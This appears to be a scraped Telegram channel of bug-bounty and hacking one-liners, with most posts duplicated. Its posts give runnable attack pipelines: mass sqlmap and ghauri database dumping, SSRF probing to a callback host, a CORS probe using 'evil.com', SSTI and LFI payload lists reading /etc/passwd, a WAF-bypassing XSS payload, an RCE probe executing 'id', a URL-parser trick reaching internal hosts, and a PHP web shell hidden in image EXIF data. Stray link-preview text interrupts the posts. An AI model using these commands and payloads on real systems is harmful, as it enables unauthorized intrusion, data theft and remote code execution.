π Find SQL injection on the site with one command
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
#web #sqli
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
#web #sqli
π11
β Search for SSRF on a site with one command
To accomplish this task, we will use several utilities.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Getallurls (gau) extracts known URLs from the AlienVault Open Threat Exchange, Wayback Machine, and Common Crawl.
Qsreplace takes URLs as input and replaces all query string values ββwith the value specified by the user.
After installing the above tools, simply run the following command:
Replace your.burpcollaborator.net with your server (or Burp Collaborator ) address
#web #ssrf
To accomplish this task, we will use several utilities.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Getallurls (gau) extracts known URLs from the AlienVault Open Threat Exchange, Wayback Machine, and Common Crawl.
Qsreplace takes URLs as input and replaces all query string values ββwith the value specified by the user.
After installing the above tools, simply run the following command:
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net
Replace your.burpcollaborator.net with your server (or Burp Collaborator ) address
#web #ssrf
π6
π Find hidden parameters for IDOR search
When you encounter the following endpoints, try to look for hidden parameters as there is a high probability of encountering IDOR (Insecure Direct Object Reference):
To find hidden parameters you can use Arjun or fuzzparam .
https://github.com/0xsapra/fuzzparam
https://github.com/s0md3v/Arjun
Burpsuite has a param-miner extension for this purpose.
https://github.com/PortSwigger/param-miner
#web #IDOR@ExploitQuest
When you encounter the following endpoints, try to look for hidden parameters as there is a high probability of encountering IDOR (Insecure Direct Object Reference):
/settings/profile
/user/profile
/user/settings
/account/settings
/username
/profile
To find hidden parameters you can use Arjun or fuzzparam .
https://github.com/0xsapra/fuzzparam
https://github.com/s0md3v/Arjun
Burpsuite has a param-miner extension for this purpose.
https://github.com/PortSwigger/param-miner
#web #IDOR@ExploitQuest
π5
ExploitQuest
Photo
π Finding web servers vulnerable to CORS attacks
The following one-liner can determine if any subdomain of the target domain is vulnerable to cross-origin resource sharing (CORS) attacks:
For this combination to work, please install the following tools:
https://github.com/tomnomnom/assetfinder
https://github.com/projectdiscovery/httpx
https://github.com/shenwei356/rush
Here's what the team does in detail:
Collect subdomains of a target domain (e.g. fitbit.com ). Identifies real (live) subdomains and creates a list of URLs. Checks access to each URL and includes the Origin: evil.com HTTP header in each request. Looks for " evil.com " in response headers. If found, outputs the information to the terminal.
If we see something like the screenshot below, it means that the sites in question have misconfigured their CORS policy and could potentially expose sensitive information to any arbitrary third-party website. This information includes cookies, API keys, CSRF tokens, and other sensitive data.
For more information about CORS attacks, check out PortSwigger's CORS security guide :
https://portswigger.net/web-security/cors
#web #cors
The following one-liner can determine if any subdomain of the target domain is vulnerable to cross-origin resource sharing (CORS) attacks:
assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] \033[0m{}"' 2>/dev/nullFor this combination to work, please install the following tools:
https://github.com/tomnomnom/assetfinder
https://github.com/projectdiscovery/httpx
https://github.com/shenwei356/rush
Here's what the team does in detail:
Collect subdomains of a target domain (e.g. fitbit.com ). Identifies real (live) subdomains and creates a list of URLs. Checks access to each URL and includes the Origin: evil.com HTTP header in each request. Looks for " evil.com " in response headers. If found, outputs the information to the terminal.
If we see something like the screenshot below, it means that the sites in question have misconfigured their CORS policy and could potentially expose sensitive information to any arbitrary third-party website. This information includes cookies, API keys, CSRF tokens, and other sensitive data.
For more information about CORS attacks, check out PortSwigger's CORS security guide :
https://portswigger.net/web-security/cors
#web #cors
GitHub
GitHub - tomnomnom/assetfinder: Find domains and subdomains related to a given domain
Find domains and subdomains related to a given domain - tomnomnom/assetfinder
π₯°9β€5π4
π Automate the search for Server-side Template Injection (SSTI)
First, save these payloads to a file payloads.txt (you can add your own):
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for SSTI using gf:
Create a list of endpoints with the payload as a parameter:
We run the command to check the server's response for the presence of SSTI:
#web #ssti
First, save these payloads to a file payloads.txt (you can add your own):
check-ssti{{7*7}}[[1*1]]
check-ssti{{7*7}}
check-ssti{{7*'7'}}
check-ssti<%= 7 * 7 %>
check-ssti${7*7}
check-ssti${{7*7}}
check-ssti@(7*7)
check-ssti#{7*7}
check-ssti#{ 7 * 7 }
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for SSTI using gf:
echo target.com | waybackurls | gf ssti | anew -q ssti.txt
Create a list of endpoints with the payload as a parameter:
cat payloads.txt | while read -r line; do cat ssti.txt | qsreplace "$line" | anew -q sstipatterns.txt; done
We run the command to check the server's response for the presence of SSTI:
cat sstipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"check-ssti49\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"
#web #ssti
π₯°8π3β€2π2
π XSS in applications with automatic error correction
If you see that a web application is trying to guess or fix your search query (e.g. in the search bar) and has a WAF on top of it, use misspelled words to perform XSS and bypass the WAF:
Will be corrected to:
The above behavior is often observed in PHP web applications using pspell_suggest().
#web #xss #waf
If you see that a web application is trying to guess or fix your search query (e.g. in the search bar) and has a WAF on top of it, use misspelled words to perform XSS and bypass the WAF:
<scrpt>confrm()</scrpt>
Will be corrected to:
<script>confirm()</script>
The above behavior is often observed in PHP web applications using pspell_suggest().
#web #xss #waf
β€9π₯1
π Quick website check for simple LFI
We find the list of words to output /etc/passwd and place it in the payloads.txt file.
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for LFI using gf :
Create a list of endpoints with the payload as a parameter using qsreplace :
We run the command to check the server's response for LFI:
#web #lfi
We find the list of words to output /etc/passwd and place it in the payloads.txt file.
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for LFI using gf :
echo target.com | waybackurls | gf lfi | anew -q lfi.txt
Create a list of endpoints with the payload as a parameter using qsreplace :
cat payloads.txt | while read -r line; do cat lfi.txt | qsreplace "$line" | anew -q lfipatterns.txt; done
We run the command to check the server's response for LFI:
cat lfipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"root:\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"
#web #lfi
π₯21β€4π1
I want to see the interaction on the posts to know if you are interested or not βΊοΈ.
π22π₯9β€4π₯°3π2
There is a topic called Inconsistency.
Which happens between the checker functions and the libraries sending the http request.
And that's how both the checker functions and the libraries are safe.
But when they work together, they become vulnerable.
For example, in this URL:
But you are this one:
It doesn't matter at all what it is now.
It's important to say that, for example, parse_url in PHP and curl are the same thing, but this is not the case.
For example, you:
But parse_url calls this same URL google.com !
And this way, when we use curl, we can access the x.php file, which is on an internal server and does not have a public IP address.
Which happens between the checker functions and the libraries sending the http request.
And that's how both the checker functions and the libraries are safe.
But when they work together, they become vulnerable.
For example, in this URL:
https://admin@site.com
username: admin
Host: site.com
But you are this one:
https://site.com@admin.ir@moha
.tld
What is Host?
It doesn't matter at all what it is now.
It's important to say that, for example, parse_url in PHP and curl are the same thing, but this is not the case.
For example, you:
curl -v http://user@127.0.0.1:80@www.google.com/x.php
Host = 127.0.0.1
But parse_url calls this same URL google.com !
And this way, when we use curl, we can access the x.php file, which is on an internal server and does not have a public IP address.
Salesforce
Salesforce UK: The #1 AI CRM
Salesforce is the #1 AI CRM, helping companies become Agentic Enterprises where humans and agents drive success together through a unified AI, data, and Customer 360 platform.
π3β€1
Search for Sensitive files from Wayback
waybackurls domain.com| grep - -color -E "1.xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt| \\.zip| \\.tar.gz| \\.tgz| \\.bak| \\.7z| \\.rar"
π4π₯4
One liner to find RCE
cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent
β€6π₯3
One liner to find sql Injection
#sql
cat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs &&
for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done
#sql
β€7π4π₯2
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
#xss
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss#xss
β€12π2π₯2
XSS from javascript hidden params
#xss
assetfinder target.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"
#xss
π₯8β€3π3
Bypass File Upload Filtering
In image:
In image:
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg
π₯6β€5
Time based SQL Injection using waybackurls
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
π₯6